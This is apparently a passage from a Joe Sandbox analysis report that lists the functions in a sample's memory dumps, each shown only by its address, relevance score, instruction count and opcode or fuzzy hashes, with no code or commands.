                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction ID: 38aede6c9e1a478ec74fdf8371403c5be76fa9fc5f946aeb3578eeead74ae35c
                                                            • Opcode Fuzzy Hash: 607a3deceb6852d5288b94f2c8b9b075914afb68c719db66ca5244cb50052f0a
                                                            • Instruction Fuzzy Hash: 40C01200F0B52E00E43433AB14220ACA100ABC4A10FD30032D028800A298DD2285098A
                                                            Function 00007FFD9BAB308E Relevance: .0, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cc8aebcb1eff71bd17b3795262efcf406b27e5ae6d4ba570a437c0767734856
                                                            • Instruction ID: 14a06630061edd5699d62f4404aeb8dcd50b9f70e616ff7bf1bb527ff2fa1e0d
                                                            • Opcode Fuzzy Hash: 6cc8aebcb1eff71bd17b3795262efcf406b27e5ae6d4ba570a437c0767734856
                                                            • Instruction Fuzzy Hash: D3C01220F2AD2D0BEAF4B3B540311FC40C59F44700F420478D02DD31E2DC5C69C04E44
                                                            Function 00007FFD9BAB34BF Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cf4c02543934b4042fdfc947851c7b56373c9fea1891e6e5e973cea6d415d72
                                                            • Instruction ID: 6cdc3d6ab43291d9a09f2c6aaace45d7cbc9309f4e1236479768253eb1b6765e
                                                            • Opcode Fuzzy Hash: 1cf4c02543934b4042fdfc947851c7b56373c9fea1891e6e5e973cea6d415d72
                                                            • Instruction Fuzzy Hash: DEC04C11F2CC2A07E25A7A144C7567E04579F58729FD901B8E42FC72DECD5D6E0206C6
                                                            Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: 33ad0e0b0f62964a5286088932e975aff53ed14ea24affa1cab667a1f50bb830
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: 61B01210D5B45F00E43833FB08520687040AB44104FC20070D41CC019298CD12940686
                                                            Function 00007FFD9BAB6A8C Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: a17e1113cc2ff76ad5ef83dec50cf4a8ddc76538a108130fb6ffd192af274611
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: D1B09201F1E13B46F5B002D5113927906D00F64384F0B043DD83CCA1E2FDDDEE020845

                                                            Non-executed Functions

                                                            Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.1977882038.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_7ffd9bab0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 13f3d5dad1ffcac8db22fe151e01e5ab2a599158b70a56effe17946a264bc5d1
                                                            • Instruction ID: ea86475ae204a7243d3d5d7c6d2c3662e0a775d921f8d129d5007ef134d9b30d
                                                            • Opcode Fuzzy Hash: 13f3d5dad1ffcac8db22fe151e01e5ab2a599158b70a56effe17946a264bc5d1
                                                            • Instruction Fuzzy Hash: D6518D06B1957646E33973FD78219E95B848FA827FB0847B7F56E8D0C74C486081C3E9

                                                            Executed Functions

                                                            Function 00007FFD9BAA0D48 Relevance: 1.5, Strings: 1, Instructions: 278COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            • Opcode ID: c50439c9e3e918529bb3cf3507dfeaa44115ff89df06e05b6d55bfc490ffebef
                                                            • Instruction ID: a7dfc7030cbeb26cb87158363876917d0ebb53fc50b97226be1576a703b569de
                                                            • Opcode Fuzzy Hash: c50439c9e3e918529bb3cf3507dfeaa44115ff89df06e05b6d55bfc490ffebef
                                                            • Instruction Fuzzy Hash: 27910572A19A894FE7698B68C8257A97FE1FF95314F4201BED049C73E2CBB41811C750
                                                            Function 00007FFD9BAA1171 Relevance: .4, Instructions: 352COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca96a97f3a5f0317c5ab8653d4bd07877aacdf3ebe9c7c22295f0981950305b2
                                                            • Instruction ID: c64d8c02f08c089273663706e606182d6a5dd3684398e4a1e9f46a3c7c482989
                                                            • Opcode Fuzzy Hash: ca96a97f3a5f0317c5ab8653d4bd07877aacdf3ebe9c7c22295f0981950305b2
                                                            • Instruction Fuzzy Hash: E1B15730A0D68D8FDB58EF68C8656E97BE1FF16310F0401BBD44DCB1A2CA78A945CB90
                                                            Function 00007FFD9BAA0910 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 195e5591aa858c473bde3643d18146f4edd08be03ac7e96a1d5a1d827cc18028
                                                            • Instruction ID: 8f78d5f98a0c81a212b39524d319b35ed2376cd97e413df6035041ccfe1231a6
                                                            • Opcode Fuzzy Hash: 195e5591aa858c473bde3643d18146f4edd08be03ac7e96a1d5a1d827cc18028
                                                            • Instruction Fuzzy Hash: F1414912B0C5590FE318F7BCA4A5AF87781EF5933AB0505BBE44ECB1E7CD14A841C294
                                                            Function 00007FFD9BAA0960 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d2ccb33ce94b7a43330d81922567f5312811962f060bf8055697f359bd637da
                                                            • Instruction ID: 2cb95e721b01d0360bea984f8aff102a7eccac06968c7219b71a2fc1e12dcca1
                                                            • Opcode Fuzzy Hash: 0d2ccb33ce94b7a43330d81922567f5312811962f060bf8055697f359bd637da
                                                            • Instruction Fuzzy Hash: E6312711B0C9190FF368BB6CA46AAF533C2DF5933AB1505BBE40EC72E7CD18AC418294
                                                            Function 00007FFD9BAA0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 619413d2a7e08a08c3f2356fdff1597c2d87fdc13d8bceadd7cd498b6bb96015
                                                            • Instruction ID: 840742275d4f1ca7787b1e61e5c50b3abea66f5deed18acaaa4bef5824c12f35
                                                            • Opcode Fuzzy Hash: 619413d2a7e08a08c3f2356fdff1597c2d87fdc13d8bceadd7cd498b6bb96015
                                                            • Instruction Fuzzy Hash: 79214520B1890D0FF798BB6C946967A37C3EF99321F0204B9E80EC33F6DD54AC018291
                                                            Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction ID: b529cb0d5a020165a2589cebfe80e937c2cc09a4da923f78c2308a07ce0e9d70
                                                            • Opcode Fuzzy Hash: d71bb7e978a42b459a0d8e9e0a0c9cbf2ed05a06163b7b093c6532835327d265
                                                            • Instruction Fuzzy Hash: DB213A36B0D24D4EE331ABA898611EC7B60EF41325F0545B7D04C8E1D3D978268AC365
                                                            Function 00007FFD9BAA2075 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction ID: 8648de61f7e8f57a718017e7eb081baf93b370cab94679ef4afa1c951c6e2876
                                                            • Opcode Fuzzy Hash: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction Fuzzy Hash: FE116330B0DA0E4FEAB8EBA884646B87393FF54700F0240B5D00ED72A2DD686D418650
                                                            Function 00007FFD9BAA1FE8 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction ID: 64c0efb8ededd9b7375937b6ffdca0a2f26b62b885ddb8f4c57290109e2e9230
                                                            • Opcode Fuzzy Hash: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction Fuzzy Hash: 7311A721F1EA1E5BE7B4AB9884646F97293FF48710F1241B5D40EE31F2DEAC6E508690
                                                            Function 00007FFD9BAA449C Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c14d556068efcbd86f8984d0b70db2656fd3b6f01bc13295a951514bc4abc4e3
                                                            • Instruction ID: a2eacee2af67270d7d6ed65f631c79649d44812de9c0e1e50a93be219136b662
                                                            • Opcode Fuzzy Hash: c14d556068efcbd86f8984d0b70db2656fd3b6f01bc13295a951514bc4abc4e3
                                                            • Instruction Fuzzy Hash: DD11ED3090892D8FDBA8DB08C494BA973E6EB54310F2541A9D44ED3271CF74AE85CB45
                                                            Function 00007FFD9BAA5323 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction ID: 7d1f673562543a7625d65cf322dc3bd0157e476bbb80ed7df22ef99f9cfe7115
                                                            • Opcode Fuzzy Hash: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction Fuzzy Hash: ED017021F1AA0D4FEFB8E7B8806967822C39F94700B0A00B5D00EC72F2ECB9AD418714
                                                            Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction ID: 02e6b586664894bfd40054fb4812d7ea2db9dcc27b75b9830fb5ea75b05f2daf
                                                            • Opcode Fuzzy Hash: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction Fuzzy Hash: 7E11A335B0E68D8EE721DFA8886119C7BB1EF42711F0645B7C088DB1A2D574164987A4
                                                            Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction ID: 9bf38bdb979dfdbe8453b08beff877560a5af44b111f6b5aaba68bb9f18d51f6
                                                            • Opcode Fuzzy Hash: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction Fuzzy Hash: 9B01A135B0E68D8FE722DFA8886419CBFB1EF42711F0645F7C088DB1A2D97466498764
                                                            Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction ID: 3e927211c3c7800c72d106962f86ee1e44214be734c1e76048084bc6e357b956
                                                            • Opcode Fuzzy Hash: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction Fuzzy Hash: CE019235A0E38D9FD721DFA4885419CBFB1AF42710F1641E7D088DB1A2D9746645C754
                                                            Function 00007FFD9BAA20A4 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: 0faa1cc4696bb59613143b2fb120e16deb483ffc059ebe18adf0a15aeaeba8b3
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 2CF08634E1D91E8BEBB8AB94C8646F97362FB44311F1241B9C04ED31A1CE786E85CA50
                                                            Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction ID: a9ce8ca3fe444f8aa684a8f1104411b1f7a58184a331befda5c01c2d4e37fcd5
                                                            • Opcode Fuzzy Hash: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction Fuzzy Hash: FE018F34E0E38D9FE731DFA488A419CBFB1AF06714F1541E7D488CB1A2D9786A44C755
                                                            Function 00007FFD9BAA1AD2 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5a5166a05d4dddd6093896ee635fbdfaa42f144d2c599d59639d2e65a03c69d
                                                            • Instruction ID: 23b68c343eb5c4d51036874e40bb3e09fba96bb1638325df0d59170fe52ac86f
                                                            • Opcode Fuzzy Hash: c5a5166a05d4dddd6093896ee635fbdfaa42f144d2c599d59639d2e65a03c69d
                                                            • Instruction Fuzzy Hash: 64E06561F1E81E5FF6B4A78884643B852D3EF6CB11F470172C40DD32A1DDA92D014794
                                                            Function 00007FFD9BAA3C45 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b6f1a43839b556c4ba731e042cc2b14c54ab8c9b26ce2780fa49dd05e4fb17f
                                                            • Instruction ID: 8c5228382921ab91ce032d795e32e0f8eb3ea2b1709bebf3ac00cfdd462bbd8b
                                                            • Opcode Fuzzy Hash: 8b6f1a43839b556c4ba731e042cc2b14c54ab8c9b26ce2780fa49dd05e4fb17f
                                                            • Instruction Fuzzy Hash: 71E06D21F1A81D5FE6F4A74C84253B862D3EB6C701F420176C00DC32A1DD682D024794
                                                            Function 00007FFD9BAA0D01 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b30334a9b78f9b230578b5062510d1162a9f147521ec3b148683eabbdc3f545
                                                            • Instruction ID: 64bac5662ea4881fb5a8bcc897b89e737863e5645c1da0c4bf30722a1ef395d7
                                                            • Opcode Fuzzy Hash: 6b30334a9b78f9b230578b5062510d1162a9f147521ec3b148683eabbdc3f545
                                                            • Instruction Fuzzy Hash: 0CF0B431B0964E8EE7B8DF64C4906AD77E2EF54750F11417AD00DC32E5DA786680CA54
                                                            Function 00007FFD9BAA626F Relevance: .0, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc6c25c7992e3e5800fb7d14b4d8e949453d5709581ceaeb450938cd91efcb44
                                                            • Instruction ID: 43808d8f666e1dc4f9a90b4f9dd88d8e320c637c6c38f43af93ba1f5c88da300
                                                            • Opcode Fuzzy Hash: fc6c25c7992e3e5800fb7d14b4d8e949453d5709581ceaeb450938cd91efcb44
                                                            • Instruction Fuzzy Hash: 38E04F21F0682D2FE6B0A758C0643A85292EB6CB00F060172C40CC32A1DD6429428794
                                                            Function 00007FFD9BAA6A11 Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 592830685c710e191fb463840f7aeedee90a1c284bcab971093a6569cda1cf6c
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: C4E01220F0901E4BFBB4A794C8607B962A2AF99704F1640B4D80DD33E2DDB86F858755
                                                            Function 00007FFD9BAA5384 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: bd3442ea4e735877b8db32a656f572c63090908754372b42d4afd2c019a513ff
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 1DE0EC24F0A90E4FEEA4FBA480786B822C39F94710F0A40B4D40EC71B2DDA8A9014720
                                                            Function 00007FFD9BAA0835 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction ID: 4ca0cf5f36246c5a70c8128036d966815203504818490876a24fa534440c4671
                                                            • Opcode Fuzzy Hash: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction Fuzzy Hash: 98C01210B5740D51D43473AEEC664EDB741AF4811CF864171E40D84096DC491587C1AA
                                                            Function 00007FFD9BAA0B9D Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 951c45c2a0a23ea344f7b847046ce02511c6079dafc3ae047fc3d06edc29c598
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 27C0123062A80E8FDA90BB68C889824BBA0FB0E201BDA00E0E04CC71A1D65A98908700
                                                            Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
